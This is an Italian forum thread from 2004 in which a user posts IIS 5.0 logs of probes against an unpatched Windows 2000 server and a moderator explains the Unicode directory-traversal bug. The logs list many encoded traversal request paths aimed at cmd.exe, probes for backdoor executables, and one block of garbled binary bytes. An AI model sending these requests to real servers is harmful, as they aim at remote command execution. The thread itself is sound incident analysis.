Utility
Home Messaggi odierni FAQ Ricerca avanzata Lo staff del forum Regolamento Utenti Archivio
Visualizzazione dei risultati da 1 a 5 su 5
  1. 19-05-2004, 01:40 #1
    dariopc
    dariopc non in linea
    Utente di HTML.it
    Registrato dal
    Oct 2002
    Messaggi
    172

    Tentativo di Intrusione: guardate questi log

    basta lasciare attivo IIS e disabilitare i firewall su una macchina win2000 senza tutti gli aggiornamenti di sicurezza

    ma qualcuno sa dirmi cosa hanno provato a fare in particolare ?


    Log1:
    01:08:07 62.211.198.96 HEAD /Default.asp 200
    01:08:07 62.211.198.96 HEAD /MSADC/root.exe 404
    01:08:14 62.211.198.96 HEAD /winnt/system32/cmd.exe 404
    01:08:14 62.211.198.96 HEAD /c/winnt/system32/cmd.exe 404
    01:08:14 62.211.198.96 HEAD /iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
    01:08:16 62.211.198.96 HEAD /winnt/system32/cmd.exe 404
    01:08:16 62.211.198.96 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
    01:08:17 62.211.198.96 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
    01:08:17 62.211.198.96 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
    01:08:17 62.211.198.96 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
    01:08:17 62.211.198.96 HEAD /adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    01:08:18 62.211.198.96 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
    01:08:18 62.211.198.96 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
    01:08:18 62.211.198.96 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
    01:08:20 62.211.198.96 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
    01:08:20 62.211.198.96 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
    01:08:21 62.211.198.96 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
    01:08:21 62.211.198.96 HEAD /msadc/..%5c../..%5c../..%5c/..../..../..../winnt/system32/cmd.exe 500
    01:08:22 62.211.198.96 HEAD /winnt/system32/cmd.exe 404
    01:08:26 62.211.198.96 HEAD /msadc/..o../winnt/system32/cmd.exe 404
    01:08:26 62.211.198.96 HEAD /msadc/..%pc../..%pc../..%pc../winnt/system32/cmd.exe 500
    01:08:27 62.211.198.96 HEAD /msadc/..%pc../winnt/system32/cmd.exe 500
    01:08:27 62.211.198.96 HEAD /winnt/system32/cmd.exe 404
    01:08:37 62.211.198.96 HEAD /winnt/system32/cmd.exe 404
    01:08:37 62.211.198.96 HEAD /msadc/..../..../..../winnt/system32/cmd.exe 404
    01:08:38 62.211.198.96 HEAD /msadc/..../winnt/system32/cmd.exe 404
    01:08:38 62.211.198.96 HEAD /msadc/..../..../..../winnt/system32/cmd.exe 404
    01:08:39 62.211.198.96 HEAD /msadc/..../winnt/system32/cmd.exe 404
    01:08:43 62.211.198.96 HEAD /samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    01:08:43 62.211.198.96 HEAD /winnt/system32/cmd.exe 404
    01:08:44 62.211.198.96 HEAD /winnt/system32/cmd.exe 404
    01:08:44 62.211.198.96 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe 404
    01:08:45 62.211.198.96 HEAD /scripts/..%5c../winnt/system32/cmd.exe 404
    01:08:45 62.211.198.96 HEAD /scripts/..%5c../winnt/system32/cmd.exe 404
    01:08:45 62.211.198.96 HEAD /scripts/..%5c../winnt/system32/cmd.exe 404
    01:08:46 62.211.198.96 HEAD /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
    01:08:46 62.211.198.96 HEAD /scripts/..%2f../winnt/system32/cmd.exe 404
    01:08:46 62.211.198.96 HEAD /scripts/..%5c%5c../winnt/system32/cmd.exe 404
    01:08:48 62.211.198.96 HEAD /scripts/..%5c..%5cwinnt/system32/cmd.exe 404
    01:08:48 62.211.198.96 HEAD /scripts/..%5c../winnt/system32/cmd.exe 404
    01:08:48 62.211.198.96 HEAD /winnt/system32/cmd.exe 404
    01:08:49 62.211.198.96 HEAD /scripts/........winnt/system32/cmd.exe 404
    01:08:53 62.211.198.96 HEAD /winnt/system32/cmd.exe 404
    01:08:53 62.211.198.96 HEAD /scripts/..%9v../winnt/system32/cmd.exe 404
    01:08:53 62.211.198.96 HEAD /winnt/system32/cmd.exe 404
    01:08:54 62.211.198.96 HEAD /scripts/..%qf../winnt/system32/cmd.exe 404
    01:08:54 62.211.198.96 HEAD /scripts/..../winnt/system32/cmd.exe 404
    01:08:55 62.211.198.96 HEAD /scripts/..%8s../winnt/system32/cmd.exe 404
    01:08:55 62.211.198.96 HEAD /winnt/system32/cmd.exe 404
    01:08:56 62.211.198.96 HEAD /scripts/..o../winnt/system32/cmd.exe 404
    01:08:56 62.211.198.96 HEAD /scripts/..%pc../winnt/system32/cmd.exe 404
    01:08:56 62.211.198.96 HEAD /winnt/system32/cmd.exe 404
    01:08:57 62.211.198.96 HEAD /scripts/..../winnt/system32/cmd.exe 404
    01:09:01 62.211.198.96 HEAD /scripts/..../winnt/system32/cmd.exe 404
    01:09:01 62.211.198.96 HEAD /scripts/..../winnt/system32/cmd.exe 404
    01:09:01 62.211.198.96 HEAD /scripts/root.exe 404
    01:09:02 62.211.198.96 HEAD /msadc/..../..../..../winnt/system32/cmd.exe 404


    Log2:
    00:07:57 147.226.208.134 GET / 403
    00:07:59 147.226.208.134 SEARCH / 411
    00:30:06 80.236.61.97 GET / 403
    00:30:09 80.236.61.97 SEARCH / 411
    00:46:07 207.177.30.175 GET / 403
    00:46:10 207.177.30.175 SEARCH / 411
    00:56:02 213.42.2.26 GET / 403
    01:12:41 137.140.136.150 GET / 403
    01:12:43 137.140.136.150 SEARCH / 411
    01:32:09 68.74.72.31 GET / 403
    01:32:11 68.74.72.31 SEARCH / 411
    02:10:49 132.170.34.157 GET / 403
    02:10:51 132.170.34.157 SEARCH / 411
    02:59:39 219.140.60.13 GET /default.ida 404
    03:20:00 200.74.183.181 GET /.hash=3ada34511dd13b28eb8ed1c3a827de603bad6051 404
    04:20:30 4.12.42.19 GET / 403
    04:20:32 4.12.42.19 SEARCH / 411
    04:43:00 68.191.110.223 GET / 403
    04:43:02 68.191.110.223 SEARCH / 411
    05:07:28 131.104.193.206 GET / 403
    05:07:31 131.104.193.206 SEARCH / 411
    05:13:15 63.172.48.66 GET / 403
    05:13:16 63.172.48.66 SEARCH / 411
    07:24:46 213.103.221.222 GET /.hash=3ada34511dd13b28eb8ed1c3a827de603bad6051 404
    07:40:24 212.133.129.21 GET /.hash=3ada34511dd13b28eb8ed1c3a827de603bad6051 404
    08:30:56 4.12.35.155 GET / 403
    08:30:57 4.12.35.155 SEARCH / 411
    08:37:15 216.96.14.33 GET / 403
    08:37:16 216.96.14.33 SEARCH / 411
    09:53:27 144.134.193.68 GET / 403
    09:53:28 144.134.193.68 SEARCH / 411
    10:28:12 68.249.140.95 GET / 403
    10:28:12 68.249.140.95 SEARCH / 411
    11:05:29 220.159.51.97 GET / 403
    11:05:30 220.159.51.97 SEARCH / 411
    11:16:52 218.59.125.155 GET / 403
    11:16:53 218.59.125.155 SEARCH / 411
    11:45:13 147.46.57.138 GET / 403
    11:45:13 147.46.57.138 SEARCH / 411

    Log3:
    #Software: Microsoft Internet Information Services 5.0
    #Version: 1.0
    #Date: 2004-01-27 18:03:50
    #Fields: time c-ip cs-method cs-uri-stem sc-status
    18:03:50 200.194.208.6 GET /sumthin 404

    Log4:
    #Software: Microsoft Internet Information Services 5.0
    #Version: 1.0
    #Date: 2004-01-26 04:35:55
    #Fields: time c-ip cs-method cs-uri-stem sc-status
    04:35:55 151.38.185.203 GET /default.ida 404
    05:52:10 151.38.185.203 GET /default.ida 404
    11:38:00 194.185.242.14 GET /scripts/nsiislog.dll 404
    Rispondi quotando Rispondi quotando
  2. 19-05-2004, 01:42 #2
    dariopc
    dariopc non in linea
    Utente di HTML.it
    Registrato dal
    Oct 2002
    Messaggi
    172
    Log5:
    #Software: Microsoft Internet Information Services 5.0
    #Version: 1.0
    #Date: 2004-01-28 20:16:57
    #Fields: time c-ip cs-method cs-uri-stem sc-status
    20:16:57 195.175.132.251 GET /.hash=cdf550d8af3be8c27b517fdc62dae5460ef6e351 404
    20:22:42 195.175.132.251 GET /.hash=cdf550d8af3be8c27b517fdc62dae5460ef6e351 404
    21:22:30 218.200.216.10 GET /scripts/nsiislog.dll 404
    22:13:27 82.84.68.228 CONNECT - 501
    22:14:06 82.84.68.228 CONNECT - 501
    22:14:45 82.84.68.228 CONNECT - 501
    22:17:00 82.84.68.228 CONNECT - 501


    Log7:
    #Software: Microsoft Internet Information Services 5.0
    #Version: 1.0
    #Date: 2004-02-05 00:15:32
    #Fields: time c-ip cs-method cs-uri-stem sc-status

    3AAA V3N FF^Ue e VWNtFS]~ S航 M]EE ( M[FEȋ~ NF>u~_^ QƒQ3ɊhfU SV3ۃ}W u
    N Nu t 3_^[ Nu >tEGtXGe EE Mv؅t5M5 EEtFMUPыHXR< M EEj[ 뗋QƒQ3ɊhHP
    Rispondi quotando Rispondi quotando
  3. 19-05-2004, 01:44 #3
    dariopc
    dariopc non in linea
    Utente di HTML.it
    Registrato dal
    Oct 2002
    Messaggi
    172
    Log6:
    09:47:33 212.154.48.59 HEAD / 403
    09:47:35 212.154.48.59 HEAD /c/winnt/system32/cmd.exe 404
    09:47:36 212.154.48.59 HEAD /d/winnt/system32/cmd.exe 404
    09:47:41 212.154.48.59 HEAD /c/windows/system32/cmd.exe 404
    09:47:42 212.154.48.59 HEAD /d/windows/system32/cmd.exe 404
    09:47:43 212.154.48.59 HEAD /MSADC/root.exe 404
    09:47:44 212.154.48.59 HEAD /MSADC/cmd1.exe 404
    09:47:46 212.154.48.59 HEAD /MSADC/cmd2.exe 404
    09:47:47 212.154.48.59 HEAD /MSADC/blackbeard.exe 404
    09:47:48 212.154.48.59 HEAD /MSADC/serverdata.exe 404
    09:47:49 212.154.48.59 HEAD /MSADC/superlol.exe 404
    09:47:49 212.154.48.59 HEAD /MSADC/sensepost.exe 404
    09:47:51 212.154.48.59 HEAD /MSADC/shell.exe 404
    09:47:52 212.154.48.59 HEAD /MSADC/exchange.exe 404
    09:47:57 212.154.48.59 HEAD /scripts/root.exe 404
    09:48:03 212.154.48.59 HEAD /scripts/cmd1.exe 404
    09:48:05 212.154.48.59 HEAD /scripts/cmd2.exe 404
    09:48:06 212.154.48.59 HEAD /scripts/blackbeard.exe 404
    09:48:07 212.154.48.59 HEAD /scripts/serverdata.exe 404
    09:48:09 212.154.48.59 HEAD /scripts/superlol.exe 404
    09:48:10 212.154.48.59 HEAD /scripts/sensepost.exe 404
    09:48:11 212.154.48.59 HEAD /scripts/shell.exe 404
    09:48:12 212.154.48.59 HEAD /scripts/exchange.exe 404
    09:48:14 212.154.48.59 HEAD /exchange/root.exe 404
    09:48:15 212.154.48.59 HEAD /exchange/cmd1.exe 404
    09:48:16 212.154.48.59 HEAD /exchange/cmd2.exe 404
    09:48:18 212.154.48.59 HEAD /exchange/blackbeard.exe 404
    09:48:22 212.154.48.59 HEAD /exchange/serverdata.exe 404
    09:48:29 212.154.48.59 HEAD /exchange/superlol.exe 404
    09:48:29 212.154.48.59 HEAD /exchange/sensepost.exe 404
    09:48:32 212.154.48.59 HEAD /exchange/shell.exe 404
    09:48:33 212.154.48.59 HEAD /exchange/exchange.exe 404
    09:48:35 212.154.48.59 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    09:48:36 212.154.48.59 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    09:48:37 212.154.48.59 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    09:48:41 212.154.48.59 HEAD /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    09:48:43 212.154.48.59 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    09:48:44 212.154.48.59 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    09:48:45 212.154.48.59 HEAD /Rpc/..%5c..%5cwinnt/system32/cmd.exe 404
    09:48:47 212.154.48.59 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    09:48:48 212.154.48.59 HEAD /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    09:48:48 212.154.48.59 HEAD /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
    09:48:50 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:48:51 212.154.48.59 HEAD /_mem_bin/..%9v..%9v..%9v../winnt/system32/cmd.exe 404
    09:48:52 212.154.48.59 HEAD /_mem_bin/......../winnt/system32/cmd.exe 404
    09:48:52 212.154.48.59 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
    09:48:54 212.154.48.59 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
    09:48:54 212.154.48.59 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
    09:48:56 212.154.48.59 HEAD /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
    09:48:58 212.154.48.59 HEAD /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
    09:48:59 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:49:00 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:49:01 212.154.48.59 HEAD /_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    09:49:02 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:49:04 212.154.48.59 HEAD /adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    09:49:05 212.154.48.59 HEAD /adsamples/..%5c%5c..%5c%5c..%5c%5c..%5c%5c..%5c%5c../winnt/system32/cmd.exe 404
    09:49:06 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:49:07 212.154.48.59 HEAD /adsamples/............/winnt/system32/cmd.exe 404
    09:49:09 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:49:10 212.154.48.59 HEAD /cgi-bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    09:49:11 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:49:11 212.154.48.59 HEAD /cgi-bin/..%qf../..%qf../..%qf../winnt/system32/cmd.exe 404
    09:49:13 212.154.48.59 HEAD /cgi-bin/..../..../..../winnt/system32/cmd.exe 404
    09:49:13 212.154.48.59 HEAD /iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
    09:49:15 212.154.48.59 HEAD /iisadmpwd/..%5c%5c..%5c%5c..%5c%5c..%5c%5c..%5c%5c../winnt/system32/cmd.exe 404
    09:49:15 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:49:16 212.154.48.59 HEAD /iisadmpwd/............/winnt/system32/cmd.exe 404
    09:49:16 212.154.48.59 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
    09:49:18 212.154.48.59 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
    09:49:20 212.154.48.59 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
    09:49:22 212.154.48.59 HEAD /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
    09:49:25 212.154.48.59 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
    09:49:26 212.154.48.59 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
    09:49:27 212.154.48.59 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
    09:49:28 212.154.48.59 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
    09:49:29 212.154.48.59 HEAD /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 500
    09:49:29 212.154.48.59 HEAD /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
    09:49:31 212.154.48.59 HEAD /msadc/..%5c../..%5c../..%5c/..../..../..../winnt/system32/cmd.exe 500
    09:49:31 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:49:33 212.154.48.59 HEAD /msadc/..o../winnt/system32/cmd.exe 404
    09:49:33 212.154.48.59 HEAD /msadc/..%pc../..%pc../..%pc../winnt/system32/cmd.exe 500
    09:49:34 212.154.48.59 HEAD /msadc/..%pc../winnt/system32/cmd.exe 500
    09:49:36 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:49:37 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:49:39 212.154.48.59 HEAD /msadc/..../..../..../winnt/system32/cmd.exe 404
    09:49:40 212.154.48.59 HEAD /msadc/..../winnt/system32/cmd.exe 404
    09:49:43 212.154.48.59 HEAD /msadc/..../..../..../winnt/system32/cmd.exe 404
    09:49:46 212.154.48.59 HEAD /msadc/..../winnt/system32/cmd.exe 404
    09:49:47 212.154.48.59 HEAD /samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
    09:49:50 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:49:51 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:49:53 212.154.48.59 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe 404
    09:49:54 212.154.48.59 HEAD /scripts/..%5c../winnt/system32/cmd.exe 404
    09:50:05 212.154.48.59 HEAD /scripts/..%5c../winnt/system32/cmd.exe 404
    09:50:08 212.154.48.59 HEAD /scripts/..%5c../winnt/system32/cmd.exe 404
    09:50:09 212.154.48.59 HEAD /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
    09:50:14 212.154.48.59 HEAD /scripts/..%2f../winnt/system32/cmd.exe 404
    09:50:16 212.154.48.59 HEAD /scripts/..%5c%5c../winnt/system32/cmd.exe 404
    09:50:17 212.154.48.59 HEAD /scripts/..%5c..%5cwinnt/system32/cmd.exe 404
    09:50:18 212.154.48.59 HEAD /scripts/..%5c../winnt/system32/cmd.exe 404
    09:50:18 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:50:20 212.154.48.59 HEAD /scripts/........winnt/system32/cmd.exe 404
    09:50:22 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:50:23 212.154.48.59 HEAD /scripts/..%9v../winnt/system32/cmd.exe 404
    09:50:24 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:50:25 212.154.48.59 HEAD /scripts/..%qf../winnt/system32/cmd.exe 404
    09:50:25 212.154.48.59 HEAD /scripts/..../winnt/system32/cmd.exe 404
    09:50:27 212.154.48.59 HEAD /scripts/..%8s../winnt/system32/cmd.exe 404
    09:50:27 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:50:29 212.154.48.59 HEAD /scripts/..o../winnt/system32/cmd.exe 404
    09:50:30 212.154.48.59 HEAD /scripts/..%pc../winnt/system32/cmd.exe 404
    09:50:32 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:50:34 212.154.48.59 HEAD /scripts/..../winnt/system32/cmd.exe 404
    09:50:35 212.154.48.59 HEAD /scripts/..../winnt/system32/cmd.exe 404
    09:50:35 212.154.48.59 HEAD /scripts/..../winnt/system32/cmd.exe 404
    09:50:37 212.154.48.59 HEAD /srchadmin/............/winnt/system32/cmd.exe 404
    09:50:37 212.154.48.59 HEAD /srchadmin/..%5c%5c..%5c%5c..%5c%5c..%5c%5c..%5c%5c../winnt/system32/cmd.exe 404
    09:50:39 212.154.48.59 HEAD /srchadmin/..%pc..%pc..%pc..%pc..%pc../winnt/system32/cmd.exe 404
    09:50:39 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:50:41 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:50:41 212.154.48.59 HEAD /exchange/winnt/system32/cmd.exe 404
    09:50:43 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:50:43 212.154.48.59 HEAD /exchange/..../..../..../winnt/system32/cmd.exe 404
    09:50:44 212.154.48.59 HEAD /winnt/system32/cmd.exe 404
    09:50:44 212.154.48.59 HEAD /_vti_bin/root.exe 404
    09:50:46 212.154.48.59 HEAD /_vti_bin/cmd1.exe 404
    09:50:46 212.154.48.59 HEAD /_vti_bin/cmd2.exe 404
    09:50:48 212.154.48.59 HEAD /_vti_bin/blackbeard.exe 404
    09:50:48 212.154.48.59 HEAD /_vti_bin/serverdata.exe 404
    09:50:50 212.154.48.59 HEAD /_vti_bin/superlol.exe 404
    09:50:50 212.154.48.59 HEAD /_vti_bin/sensepost.exe 404
    09:50:52 212.154.48.59 HEAD /_vti_bin/shell.exe 404
    09:50:53 212.154.48.59 HEAD /_vti_bin/exchange.exe 404
    09:50:53 212.154.48.59 HEAD /pbserver/root.exe 404
    09:50:54 212.154.48.59 HEAD /pbserver/cmd1.exe 404
    09:50:54 212.154.48.59 HEAD /pbserver/cmd2.exe 404
    09:50:56 212.154.48.59 HEAD /pbserver/blackbeard.exe 404
    09:50:56 212.154.48.59 HEAD /pbserver/serverdata.exe 404
    09:50:59 212.154.48.59 HEAD /pbserver/superlol.exe 404
    09:51:00 212.154.48.59 HEAD /pbserver/sensepost.exe 404
    09:51:01 212.154.48.59 HEAD /pbserver/shell.exe 404
    09:51:02 212.154.48.59 HEAD /pbserver/exchange.exe 404
    09:51:04 212.154.48.59 HEAD /cgi-bin/root.exe 404
    09:51:05 212.154.48.59 HEAD /cgi-bin/cmd1.exe 404
    09:51:07 212.154.48.59 HEAD /cgi-bin/cmd2.exe 404
    09:51:09 212.154.48.59 HEAD /cgi-bin/blackbeard.exe 404
    09:51:10 212.154.48.59 HEAD /cgi-bin/serverdata.exe 404
    09:51:12 212.154.48.59 HEAD /cgi-bin/superlol.exe 404
    09:51:13 212.154.48.59 HEAD /cgi-bin/sensepost.exe 404
    09:51:17 212.154.48.59 HEAD /cgi-bin/shell.exe 404
    09:51:18 212.154.48.59 HEAD /cgi-bin/exchange.exe 404
    09:51:18 212.154.48.59 HEAD /rpc/root.exe 404
    09:51:20 212.154.48.59 HEAD /rpc/cmd1.exe 404
    09:51:20 212.154.48.59 HEAD /rpc/cmd2.exe 404
    09:51:22 212.154.48.59 HEAD /rpc/blackbeard.exe 404
    09:51:23 212.154.48.59 HEAD /rpc/serverdata.exe 404
    09:51:24 212.154.48.59 HEAD /rpc/superlol.exe 404
    09:51:26 212.154.48.59 HEAD /rpc/sensepost.exe 404
    09:51:27 212.154.48.59 HEAD /rpc/shell.exe 404
    09:51:29 212.154.48.59 HEAD /rpc/exchange.exe 404
    09:51:30 212.154.48.59 HEAD /iisadmpwd/root.exe 404
    09:51:31 212.154.48.59 HEAD /iisadmpwd/cmd1.exe 404
    09:51:32 212.154.48.59 HEAD /iisadmpwd/cmd2.exe 404
    09:51:34 212.154.48.59 HEAD /iisadmpwd/blackbeard.exe 404
    09:51:35 212.154.48.59 HEAD /iisadmpwd/serverdata.exe 404
    09:51:35 212.154.48.59 HEAD /iisadmpwd/superlol.exe 404
    09:51:37 212.154.48.59 HEAD /iisadmpwd/sensepost.exe 404
    09:51:37 212.154.48.59 HEAD /iisadmpwd/shell.exe 404
    09:51:39 212.154.48.59 HEAD /iisadmpwd/exchange.exe 404
    09:51:41 212.154.48.59 HEAD /_vti_cnf/root.exe 404
    09:51:42 212.154.48.59 HEAD /_vti_cnf/cmd1.exe 404
    09:51:42 212.154.48.59 HEAD /_vti_cnf/cmd2.exe 404
    09:51:44 212.154.48.59 HEAD /_vti_cnf/blackbeard.exe 404
    09:51:44 212.154.48.59 HEAD /_vti_cnf/serverdata.exe 404
    09:51:46 212.154.48.59 HEAD /_vti_cnf/superlol.exe 404
    09:51:46 212.154.48.59 HEAD /_vti_cnf/sensepost.exe 404
    09:51:48 212.154.48.59 HEAD /_vti_cnf/shell.exe 404
    09:51:49 212.154.48.59 HEAD /_vti_cnf/exchange.exe 404
    09:51:50 212.154.48.59 HEAD /adsamples/root.exe 404
    09:51:51 212.154.48.59 HEAD /adsamples/cmd1.exe 404
    09:51:52 212.154.48.59 HEAD /adsamples/cmd2.exe 404
    09:51:53 212.154.48.59 HEAD /adsamples/blackbeard.exe 404
    09:51:55 212.154.48.59 HEAD /adsamples/superlol.exe 404
    09:51:56 212.154.48.59 HEAD /adsamples/sensepost.exe 404
    09:51:57 212.154.48.59 HEAD /adsamples/shell.exe 404
    09:51:59 212.154.48.59 HEAD /adsamples/exchange.exe 404
    09:52:00 212.154.48.59 HEAD /srchadmin/root.exe 404
    09:52:02 212.154.48.59 HEAD /srchadmin/cmd1.exe 404
    09:52:03 212.154.48.59 HEAD /srchadmin/cmd2.exe 404
    09:52:04 212.154.48.59 HEAD /srchadmin/blackbeard.exe 404
    09:52:09 212.154.48.59 HEAD /srchadmin/shell.exe 404
    09:52:11 212.154.48.59 HEAD /srchadmin/exchange.exe 404
    09:52:12 212.154.48.59 HEAD /WWWROOT/root.exe 404
    09:52:14 212.154.48.59 HEAD /WWWROOT/cmd1.exe 404
    09:52:15 212.154.48.59 HEAD /WWWROOT/cmd2.exe 404
    09:52:16 212.154.48.59 HEAD /WWWROOT/blackbeard.exe 404
    09:52:22 212.154.48.59 HEAD /_mem_bin/root.exe 404
    09:52:23 212.154.48.59 HEAD /_mem_bin/cmd1.exe 404
    09:52:24 212.154.48.59 HEAD /_mem_bin/cmd2.exe 404
    Rispondi quotando Rispondi quotando
  4. 19-05-2004, 01:45 #4
    dariopc
    dariopc non in linea
    Utente di HTML.it
    Registrato dal
    Oct 2002
    Messaggi
    172
    Comunque la maggior parte hanno ricevuto errore 404
    Ammesso che i log non siano stati ritoccati

    Ciao
    Rispondi quotando Rispondi quotando
  5. 19-05-2004, 12:52 #5
    Habanero
    Habanero non in linea
    Moderatore di Sicurezza informatica e virus L'avatar di Habanero
    Registrato dal
    Jun 2001
    Messaggi
    9,782
    Directory traversal using Unicode vulnerability

    questa la tipologia del bug cercato. Inserendo dei caratteri in forma unicode rappresentanti i simboli "..\" che non vengono filtrati da IIS non patchato possibile accedere a cartelle al di fuori di quelle di pertinenza del webserver ed in particolare raggiungere la cartella dove risiede il cmd.exe. Se ci avviene si pu eseguire del codice sul server!

    Probabilmente stato lanciato contro la tua macchina una scansione che ricerca un insieme elevato di possibili vulnerabilit.
    Leggi il REGOLAMENTO!

    E' molto complicato, un mucchio di input e output, una quantit di informazioni, un mucchio di elementi da considerare, ho una quantit di elementi da tener presente...
    Drugo
    Rispondi quotando Rispondi quotando
« Discussione precedente | Prossima discussione »

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  

Regole del Forum

Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.